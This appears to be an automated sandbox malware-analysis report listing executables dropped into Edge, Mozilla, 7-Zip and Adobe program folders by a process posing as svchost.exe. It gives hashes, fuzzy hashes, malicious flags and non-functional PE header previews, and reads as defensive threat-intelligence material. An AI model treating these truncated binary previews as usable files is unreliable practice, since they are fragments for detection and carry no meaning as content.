                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@....................................`..... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.338520551230191
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:G03cT++foSBWU2YxhkgjsqjnhMgeiCl7G0nehbGZpbD:93cK+foQWU2YnPnDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:760A4847FA6BBF4A71894E3F9E146347
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D10E0AB7983322CEECB5B019D5372E799C39695E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:18445FE6ED889D202DFB215888429FB0D076E7E3A8911955768346994862C1FE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD6FAD0F7E1D5DE344D979AFD27288683207CC808DD8A010ED042B7056DB3E0E435B058DE7E50C3C8E7CE126468C8DDBCA6B4EC877E75B12C612FF0F21430B02
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.................................`........................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.13890364761392
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:EbrNRzB+NDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:EbBRzBgDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1D46224E02C9D2AE7622A2A8797507B1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C1B67C1516DBDD7BA49F48AAE06886B573D6FA83
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FDE7C48C62D0CC653F9E5171084F28DAA88726B0C613452F7BFF3B40DECF0122
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2F22BAE6C2F92A0540F06C9E87CB75AF318F5DAA9313A89CDB5E689B27955968D7524150B7453FB0826604D75D37019704D9F7703831F5B41E9EEAB62925E1A0
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.940556934516919
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:Ny53w24gQu3TPZ2psFkiSqwozxDmg27RnWGj:NyFQgZqsFki+ozxD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:767B3C0EB4B50D5D5E0679718B94C811
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B8BE6C7941F63A12FB1D7397DD1D64F09339ECD5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:28A5D4E4F071BFDBBBFCB6039A879F907DF96618F25A1706A6312E15CA111AA3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:536254C9E10FEB7773F15D9EB852C3D8E27332A48207142B334D68194E072A281A6F268F2DC78CA9520A4CFF704030DCAD106779CE9D42E96764CD9C5B9B5DA0
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......V!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.816064565491783
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:bgT03c0Ui7xDn1rtyFse6Jcliw8s2lEP0h0Cxn5O3:Lf4
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D48089F406F6F35631195B4AA56A7BB4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EF238A01BDC2F2DCF13E167F4A90FA6940235953
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5C2ECA798E540E7E60B972BE2907193EBB5B7942E341BFCAAC232B6A2D536DF5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9E942A489249AED9ED7C03B25B7B7E20B2CE43FF6DC507E3E8005EE53E5D728EF9AB625243BE02DB25BDB32A7AB233D43ACD2ABE1F99237BB74EBB34185882CB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:2024-10-08 09:28:02-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-10-08 09:28:02-0400: Disabled unneeded token privilege: SeAuditPrivilege...2024-10-08 09:28:02-0400: Disabled unneeded token privilege: SeBackupPrivilege...2024-10-08 09:28:02-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-10-08 09:28:02-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-10-08 09:28:02-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-10-08 09:28:02-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-10-08 09:28:02-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-10-08 09:28:02-0400: Disabled unneeded token privilege: SeDebugPrivilege...2024-10-08 09:28:02-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-10-08 09:28:02-0400: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-10-08 09:28:0

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.347815262474312
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:GQVTZu0JzsqjnhMgeiCl7G0nehbGZpbD:NVTZuyDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D4047A35D44FF5A878217467E0BC115E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7EA07DCB6F62D6113336C77071E72108BBA73BC2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:40E0FC2B5140A0FD2B8271B04278AA4A6584E2219682DE02D8B3663BB42FF4A1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D60F55F1B1C02306E4CD8ABD5F5764BABB49C6BD433BD61387B90C232A0A18E98693AD4F0954DCBBE8BE8087EDA4D90C429487EEA306C1AADF4D8703516D87A0
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6231126710083705
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:0+gkESfh4Co0sqjnhMgeiCl7G0nehbGZpbD:RgkE+SuDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8D9E549DF751B767352868B098FBF5A6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D420C37AD12F2A4BC7B595A386A7A1B6D16D7FBD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C63E133033CF85A8E439B05307877AFA80760623F47A2C3C91ABED79B183D521
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:864DF0E2F3938413A7C1C73D94F47170593CA0D4452DAFE39AB38D159BC14423FBD33D7A6BEC8B5D8CDAFC56A72FB2CA708755BC411A5CDAB8A9C4A5CB4048F9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.096647731774536
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:bBpDRmi78gkPXlyo0GtjrbsqjnhMgeiCl7G0nehbGZpbD:tNRmi78gkPX4o0GtjzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CBA76A2E9B51622FD14AE4FCF44136C9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0FA5038E71D537F2E8E1FD763721A87CDACDAF2E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0C480BE1D0217158DF2FD21B8E2F23B5B3BADD42A5FA955FD4926AA2B420B332
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:876F51C6BDC86A153ABA41A7CD97DE0D8A864370DDBE3C5B2F120544240C2FB8CC46DCA482A6092AE3E4EFC78774E72377941BA13365F98CB0364F51391B91F7
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................e..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.229030903346001
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:tLOS2oTPIXV0sqjnhMgeiCl7G0nehbGZpbD:H/TLDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0088CABDD491B75B91BE31662F2A874E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0178B4350C523281B8F3890EEB7DA2CF7F09967A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:57350FEB6163FE0373E1D84E6D1F5E9B20DC0B7982D0F1AB7E9F37F16C3A8AE9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2EC7301B4B1A56662A5945DD06CF3E274660FA6A403D2C18138A21138046F0A4753CDCAC20C20803D3CC2E3207186FD86C89B2BE395A70BB74F30DD36366B8EE
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@........................................... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1145344
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.031158710342239
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:/16Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/16sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2062B96C1DCBAD5928AE16BB74236626
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F15E37DD9A6BF0BEC2468F01217F9388D3BFA229
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B31EB0C164DA417087C16585679D572CE11E4AC42EBC84EBDC2CFFD8C7F99A5B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6DB95E819133CDC98D052772BD03B1BCC20C9F4738D3F1D6F8F1F6B0F8F7151EB68307295665B1DAA8650CC6C1278E0CF90AF496A5FBEC0D8C0B280AA7971D05
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................C.......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.712001125587135
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:XRudz5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:XAdz5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:19D02FEF8D6E3AE3AEB3E7AFCDFBC9AF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8F43B518484A87C21E9965E063C32E569B2AED7D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4D879ECD988A33D44902B7218DD2ABEB508AADCE65CD91BD2879980C50A6034B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:280DD0BBB69CE55E0FA4BC6B98EDE692508FA1B4EE1747230D4D7785C3027F352DAAB3A6E1641AB2F5F31DE506C288BEA231AB2F4FC892D394D6FCC8044E23CB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................4..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1457664
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.082133546142808
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:wv1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:asqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:781B2741B875CB07D01C54C5DF4FF404
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2C72DFDDD6E46AC096EBA87D33DBD00B83AA1C49
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8AE6E8B185F12599BE7B8DB02F55A6A23BBA3DCAE64C28A0D7418DCBA0A1FC98
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:485D0D47F9C0E4723483F329B736C0010D88182560851905B12BCABA7C1D4167D9BC203F28D7FEDF81DADD9CC48A07E0AED18EDDD7FEC59EA6DD791D9E0899AF
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@.......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1461248
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4686041108936285
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:F5zhM1XSEIsqjnhMgeiCl7G0nehbGZpbD:BMs9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4D65236A88A9F819EF80F4FD1D00EC30
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2B1CC5D211E79E19B7745560970F72CE650CEE38
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:001ED2CF83F0201876FA56B3B7778F147E17F193C6AE7CF1D6713EFB49463FF6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BAD7F1ED8889DB73B3445B75B8636544CD6A0789DA35544C29DC22F1B9ACF66CDA50950753DB47D27D4C7849631FC191563C0598BE059428509B0300EC502764
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.......................................... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.499773255202833
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:ztuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755XDmg27RN:zjEIa4HIEWOc5xD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E8748F8BCAED1EBF44817A1E2E5026AC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:28FD01C313DB80B8922A8F59CC811B411FDB5442
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:20FB57D36D91BE8B51AD371B94C2075B78754B7D03DBDC9FB0E5CED5A9668FBC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4B2CF7A5A7DCB777E43CD5DED4AECDFB0395512C8171156F0A8750F8A0EB86AC6047DF721B81F94D6453FDA0E38887D541F60A79E04B6B1C534CA20025456F9C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

